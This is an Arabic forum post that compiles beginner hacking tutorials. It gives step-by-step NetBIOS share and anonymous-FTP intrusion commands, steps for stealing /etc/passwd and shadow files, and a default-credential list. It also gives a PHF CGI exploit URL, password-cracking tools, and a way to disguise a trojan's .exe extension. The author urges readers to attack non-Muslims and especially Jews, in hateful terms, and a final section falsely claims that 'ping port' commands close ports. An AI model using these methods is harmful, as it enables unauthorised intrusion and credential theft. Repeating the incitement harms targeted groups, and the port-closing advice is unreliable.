السلام عليكم .
كيفك يااحلى اعضاء اليوم جايب لكم كيفية الاختراق عن طريق NetBios Attack
ولا احد يمل ويطلع لان الموضوع كثير بس مهم جدا للمبتدئين
بسم الله نبدا الشرح ..

هذه الثغرة تظهر بصورة خاصة اذا ما كان لديك Home Network او اى نوع اخر من انواع الشبكات مثل LAN او WAN او MAN وغيرها ايضا يمكن اختراق حاسبك الشخصى اذا كانت لديك تلك الثغرة.

وللتجربة على نفسك كمثال احصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا

1 بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 هذا الرقم افتراضى).



2 الان اذهب الى START ثم RUN ثم اكتب CMD لتفتح لك شاشة الدوس



3 اكتب داخل شاشة الدوس Nbtstat A IP ADRESS لا تنسى ان تكتب IP الخاص بك مكان IP ADRESS ثم اضغط ENTER



4 سيظهر لك الجدول التالى

NetBIOS Remote Machine Name Table

____________________________________

Name Type Status

-------------------------------------------

J-1 <00> UNIQUE Registered

WORK <00> GROUP Registered

J-1 <03> UNIQUE Registered

J-1 <20> UNIQUE Registered

WORK <1E> GROUP Registered

WORK <1D> UNIQUE Registered

__MSBROWSE__.<01>GROUP Registered

ملحوظة تم حذف المعلومات الاصلية من الجدول



5 الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE وما يهمنا هنا ان نجد رقم 20 ما بين الاقواس وهذا يعنى اننا لدينا PRINTER OR FILES SHARED TURNED ON وهو ما يعنى اننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الانترنت وهذا عيب خطير في انظمة التشغيل وثغرة خطيرة يمكن استغلالها في اختراقه.



6 الان يمكنك التعرف على الملفات التى يمكن مشاركتها او التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الامر التالى في شاشة الدوس:

Net view \\<insert ip_address here>



7 سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها

Shared resources at \\ip_address

Sharename Type Comment

MY DOCUMENTS Disk

TEMP Disk



8 الان يمكنك الدخول الى ملف TEMP والتلاعب فيه

Net use x: \\<insert IP address here>\temp



طبعا اسلوب NSETBIOS مر بالعديد من التطورات نظرا لان العديد من المستخدمين وانظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم باذن الله ساقدم الطرق الاخرى الاكثر تطورا في وقت لاحق .

لكي تستطيع اختراق موقع لا بد ان تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع



User name-Password



وهما يكونان محفوظين في ملف يسمي



PASSWD غالبا



بعض المواقع تضع هذا الملف في الاف تي بي



ما هو اف تي بي؟



FTP=File Transfer Protocol بروتوكول نقل الملفات



تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت



start==>run ابدا ثم تشغيل



واكتب telnet



سيفتح التلنت اضغط علىRemote System ==> connect



ثم اكتب الموقع في Host Name مثلا



kahane.org او الايبي الخاص به



وفي PORT اكتب 21 وهو البورت الخاص بالاف تي بي



ثم اضغط connect



وبعد ان يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت! شفرة source code



user anonymous



ثم انتر بعدها يطلب السيرفر كلمة السر اكتب



pass zzzoozz@yahoo.com



اكتب اي بريد ككلمة سر وطبعا سيكون وهميا



ماذا فعلنا؟لقد دخلنا الى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..



بعدها سنحصل على ملف الباسوورد



قبل ذلك احب ان اذكر انه يمكنك عمل الاشياء السابقة عن طريق اي برنامج اف تي بي مثل



cute ftp ws_ftp



مثلااو حتى الذهاب الى المتصفح وكتابة الموقع هكذا في حقل العنوان



ftp.kahane.org



لتحصل على الملف في التلنت اكتب



retr /etc/passwd



/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع



Sunos 5.0 etc/shadow او etc/passwd

Linux etc/shadow او etc/passwd

BSD4.3 RENO etc/master.passwd

AIX etc/security/passwd

NT ويندوز scripts/passwd



وتختلف اسماء ملف الباسوورد بين passwd و admin.pwl و غيرها

طريقة تغيير امتداد exe عن طريق الدوس جديد



اتبع الخطوات التالية:-

ابدا>تشغيل>واكتب command او start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat اخواني المسلمين لاتستخدموا هذه الطريقة ضد اخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم.



وهذي ارامر النت ستات مرة ثانية

مايتطسع فعله netstat



==============================================



NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة

NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها

NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام

NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة

NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك

NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك

NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة



هذا اوامر للدخول الى جهاز الضحية:

FTP

اولا و لنجاح الاقتحام يجب ان يكون لدى الضحية البورت

21

مفتوح و هو البورت الخاص ب

FTP

و لتاكد من ان البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها

Superscanne

بعدما تتاكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي

اضغط على

Start

ثم

Run

ثم اكتب

ftp n

تطلع لك نافدة في الدوس مكتوب عليها

FTP&g

لحد هنا كل شيء تمام

و بعدين اكتب

Open

ثم اضغط على

ادخال

Enter

تتحصل عب النتيجة التالية

FTP&g

To

اكتب جنب

To

رقم IP الضحية ثم اضغط على ادخال

و الحين اهم جزء



ادا تحصلت على هذا الرد فقد تخطيت خطوة

Connected to www.assassin.com

220 websrv1 Microsoft FTP Service Version 4.0).

و الان اكتب الكتابة التالية

ftp&gquote user ftp

ادا تحصلت على هذا الرد فقد تخطيت خطوة

331 Anonymous acces allowed send identify e-mail name as password.

و الان اكتب الكتابة التالية

ftp&gquote cwd ~root

ادا تحصلت على هذا الرد فقد تخطيت خطوة

530 Please login with USER and PASS

ثم اكتب الكتابة التالية

ftp&gquote pass ftp

ادا تحصلت على هذا الرد فقد تخطيت خطوة

و نجحت في الاقتحام يعني الاختراق



230 Anonymous user logged in.

مبروووك انت الحين في جهاز المسكين ذا الي بتحوسه

ما عليك الان الا ان تقوم باستعمال

اوامر الفتيبي

و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الاقتحام من دون ما اعرف و لا فكرة على اوامر الفتيبي و اذا اردتم ان تضحكو بقالياكثر من 20 دقيقة و انا مجمد الايدي و الضحية عالقة من دون ان اعمل اي شيء وعشان كذا

قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق



Pwd

لكي تعر ما يحتويه الهارد ديسك

Cd

لاقتحام مجلد مثال

Cd black

في هدا المثال قمت باقتحام مجلد المسمى بلاك

Ls

لكي يتضح لك محتوى المجلد او الهارد ديسك

Get

لكي تحمل الى سطح المكتب بتاع جهازك

مثال

Get black.exe

Put

العملية الع**ية ل

Get

يعني ان تاخد ملف من سطح المكتب بتاع جهازك و تضعه في

في جهاز الضحية

مثال

Put black.exe

Clos

لقطع الاتصال مع الضحية





هذا اهم الاوامر والحين ابعلمكم على انواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الاوامر و شرحها و ارقامها

Codes: Signification:

110 Restart marker reply.

120 Service ready in nnn minutes nnn est un temps)

125 Data connection already open; transfer starting.

150 File status oka about to open data connection.

200 Command okay.

202 Command not implemented superfluous at this site.

211 System status or system help reply.

212 Directory status.

213 File status.

214 Help message.

215 NAME system type.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection.

227 Entering passive mode h1 h2 h3 h4 p1 p2).

230 User logged in proceed.

250 Requested file action okay completed.

257 \"PATHNAME\" created.

331 User name okay need password.

332 Need account for login.

350 Requested file action pendingfurther information.

421 Service not available closing control connection.

425 Can\'t open data connection.

426 Connection closed; transfer aborded.

450 Requested file action not taken Fichier déjà utilisé par autre chose)

451 Requested action aborded: local error processing.

452 Requested action not taken Pas assez de mémoire pour exécuter l\'action)

500 Syntax error command unrecognized.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken Fichier non trouvé pas d\'accès possible,...)

551 Requested action aborded: page type unknown.

552 Requested file action aborded.

553 Requested action not taken Nom de fichier non attribué)

------------------------

اختراق الاجهزة

ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بامكانك حذف اضافة ازالة الملفات فيه ..

تتم ايضا بنفس الطريقة من متصفحك اكتب Telnet://IPNumberort حيث ان IPNumber هو رقم الاي بي الخاص بالضحية اما port هو رقم المنفذ القابل لاجراء التيل نت عليه وهو يفترض ان يكون احد المنافذ التالية

21 25 32(الاساسي 99 2001

والعديد العديد من المنافذ الاخرى وهذه فقط على سبيل المثال

==================

3 اختراق المواقع

يجب ان يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض تجده في http://packetstorm.securify.com/ قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه او باسم SSS

المهم بعد ما تتصل بالتيل نت للموقع حاول ان تدخل باي يوزنيم او باسوورد من التالية او غيرها

اسم المستخدم كلمة المرور

anonymous anonymous

guest guest

root root

sys sys

sys sysadm

sys system

games games

ftp ftp

mail mail

وان لم تنجح(في حال كون نظام التشغيل في السيرفر ينو* Unix ويمكنك معرفته بواسطة البرنامج المذكورة اعلاه جرب التالية

young

test

لاحظ انها غير محمية بكلمة سر وتسمى unpassworded accounts

اي الحسابات الغير محمية بكلمة سر

اكتب الامر

GET /etc/passwd و GET /etc/group و GET /etc/shadow

ملاحظة بعد كتابة كل امر يجب ان تظيف

data = download

لكي تتمكن من التحكم بالملفات

===================================

ماهو الملف psswd

الملف ذا فضيحة فيه باسوورد صاحب الموقع ..وباسووردات غيرها بكثير من ظمنها باسوورد الroot

ملاحظة للمبتدئين الroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون ان يوقفه النظام وبامكانه ان يكون اي مستخدم على الشبكة بواسطة الامر su username ولن يحتاج الى باسوورد

هذا الملف في ثلاث حالات

1 مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا

2 معمول له shadow وليس هناك طريقة لفك الshadow او ما يسمى بunshadow

3 متروك مثل ما هو .

لنفترض انه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة لا والف لا

الباسووردات مشفرة . سوف تراها كالمثال التالي

sirhack:89fGc%^7&a Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh

هنا سوف نعرف المعلومات التالية:

1 اسم المستخدم sirhack

2 كلمة السر 89fGc%^7

3 الاسم الحقيقي Sir Hackalot

4 مجلد الحساب usr/sirhack/

5 الغلاف(هنا الكلام في ينو* او لينو** bin/sh/

كما رايتم فكلمة السر مشفرة

===================================

ما هو الملف group

هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية وحالاته نفس حالات الملف passwd الا انه لا يغير تسميته

===================================

ما هو الملف shadow

في حالة كون الملف psswd مشفر سوف نحتاج الى هذا الملف لانه لن يكون مشفرا ..

===================================

كيف افك التشفير

استخدم احد برنامجين

1 Cracker Jack

2 John the ripper

وكلهما يوجد منهما نسخة لويندوز ونسخة للينو**(وينو** ..



نسخة اللينو**

http://www.openwall.com/john/john-1.6.tar.gz



نسخة الويندوز

http://www.openwall.com/john/john-16w.zip



++++++++++++++++++++++++++++++++++++++++++++++++++





التل نت اداة فقط بس هذي الاداة ضرورية في كل شي المهم راح اشرح اليوم طريقة الاختراق جربتها مره وصارت

وهي تعتبر من اسهل طرق الاختراق

خلينا نفسم الدرس الى اربع اقسام



بسم الله بدانا

و اضغط enter ثم القسم الاول:

اول شي ضروري نعرف بعض الاوامر الليون* السهلة

HELP = HELP

COPY = CP

MOVE = MV

DIR = LS

DEL = RM

CD = CD

هذي مهمة جدا لنبدا التعليم

واكو بعد WHO هذي اذا تعرف منو موجود على السيرفر وبعد اكو FINGER اسم المستخدم بين FINGER اسم المستخدم مسافة بدون الاقواس المهم ويا هذي الاوامر راح نقدر نتماشى ويا الدرس



القسم الثاني:

نظام اليون* او السيرفر مالته يحتفظ في كلمات السر في etc directory/ واسم الفايل passwd انته هسه تتوقع انك بس حصلت هذا الملف انتهى الموضوع وصرت هاكر لا

انته غلطان ميه بالميه لانو الباسيوردات مشفره ومستحيل تقدر تطلع الباسيورد منها

بس اكو حل اكو برنامج اسمه Cracker Jack هو مثل القاموس للتشفير يحتوي على الكثير من الباسيودات تقدرتنز http://www.geocities.com/SiliconValley/9185

وتقدر تحصل باسيوردات اكثر في sable.ox.ac.uk/pub/wordlists تنزله هو حوالي 4 ميجا بايت مظغوط يصير 8 ميجا بايت لاوم تحطه في ملف البرنامج

انا ان شاء الله راح اشرح برنامج Cracker Jack عن قريب بس اكو فايل موجود في البرنامج يعلمك المهم



القسم الثالث(الاصعب):

النظام يحفظ الباسيوردات احنا ما نقدر ندخل على السيستم لانو احن مو مصرح لنا المهم شلون نجيب ملف الباسيورد في طريقتين سهلات بس احيانا تشتغل

اولها تدخل للسيستم كانك anonymously لما تدخل مرات ftpمايكون مانع الدخول لملف الباسيوردات انته عليك تسوي etc directory/ تشوف اذا الباسيورد عليها حظراو لا اذا

ماكو عليها حظر بسهولة نزل ملف الباسيورد وشغل البرنامج Cracker Jack وطلع الباسيورد وة عليك بس اذا جان عليها حظر لازم تجرب الخطة الثانية في ملفات اسمها PHF هذي تحوي على كل شي باسيوردات وملفات والتحكم



فانته شلون تدخل عليها تفتح الا**يبلوير

http://xxx.xxx.xxx/cgi-bin/phf?Qali...t%20/etc/passwd

ملاحظة بدال الا**ات تكتب عنوان الموقع انا نجحت بالدخول على موقع عن طريق هذا بالمناسبة تقدر تخترق منتدى عن طريق هذي الحركة

اذا ما نجحوا الحركيتن معناها الباسيورد مضلل يعني موجود هذا النظام لحفظ الباسيوردات اللي انته ما تقدر تدخل عليها بس ماكو شي مستحيل

مرات في بعض الانظمة يكون السيستم بيه backup للباسوردات وتقدر تبحث عنه مثلا في etc/shadow/ بس يمكن تشتغل ويمكن ما تشتغل انته وحظك

ولهذا السبب انا معجب جدا في نظام apache لانه نظام رائع جدا ولايمكن اختراقه بسهولة



الجزء الرابع:

زين هسه حصلت الباسيوردمال اليوزر نيم اللي تريد تخترقه شلون تقدر تاخذها الك؟؟

شوف

تفتح التل نت وتدخل على السيرفر وتكتب اليوزر نيم والباسيورد بعدني تقدرتسوي اللي يحلو لك طبعا لكل سيرفر اوامر يوجد امثلة على السيرفر



UNIX,linux aix irix ultrix bsd or sometimes even DOS or Vax / Vms)



ملاحظة:يا اخوان انا لو اعرف نظام اليون* جيدا كان جعلت من نفسي هاكر ولكني كنت تحت غشاوة البرامج بس هسه الحمد لله بديت اتعلم الليون* ثم سابدا بنظام اليون**

وان شاء الله ذلك سيساعدني على جعل من نفسي كل الهاكرز الحقيقن يعتمدون على اليون* وليش على البرامج فيا اخوان شيلوا عنكم غشاوة

السب سفن وغيره وما عليك الا تتعلم من كتب او تاخذ كورس براحتك وانا مستعد اورك ابواب مال الهاكرز راح تتعجب انا ما اقور هذا الكلام ني خبير او اي شي ثاني

اقوله دعوة الكم والي حتى نبدا بالطريق الصحيح للهاكرز





الطاعون

+++++++++++++++++++++++++++





اغلاق المنافذ port الموجودة بالجهاز



اول شيء بقوله انه الكثير منا قد يتخوف من الهاكر واكثر البرنامج الفايرول الجدار الناري قد تفى بالغرض ولكن لو لم تستخدم بطريقه سليمه فيكون وجودها مثل عدمها .....



اقدم لكم هذه الطريقه التى عن طريقها تستطيع تقفيل جميع البورتات الثغرات الامنيه الموجوده بكل الاجهزه





اتمنى اتباع الطريقه كما هي

ادهب الى:

Start&gRun ابداء &l تشغيل



واكتب الامر التالي

command.com



ستظهر لك نافذة اكتب فيها:

ping host





انتظر و اكتب:

ping port





و اضغط enter



ثم انتظر و اكتب:

ping port1027

واضغط enter

و انتظر ثم اكتب:

ping port80





و اضغط enter

ثم اكتب:

ping

و اضغط enter



ثم اكتب:

ping port

و اضغط enter





و الان انتهت المهمة. لقد قمت بتقفيل بورت في ال الخاص بك و لقد تم منع دخول الهاكرز من تلك الثغرة الامنية.

======================================



&&&&&&&&&&&&&&&&&&&

شرح تفصيلي لكيفية الاختراق بالنت بيوس netbios

http://digitalx.150m.com/1.htm

&&&&&&&&&&&&&&&&&&&


وتقبلو تحياتي **هلالي روماوي** وتر تعبت على الموضوع عشان كذا الله الله بالردود الله لايسامح اللي يدخل ولا يرد)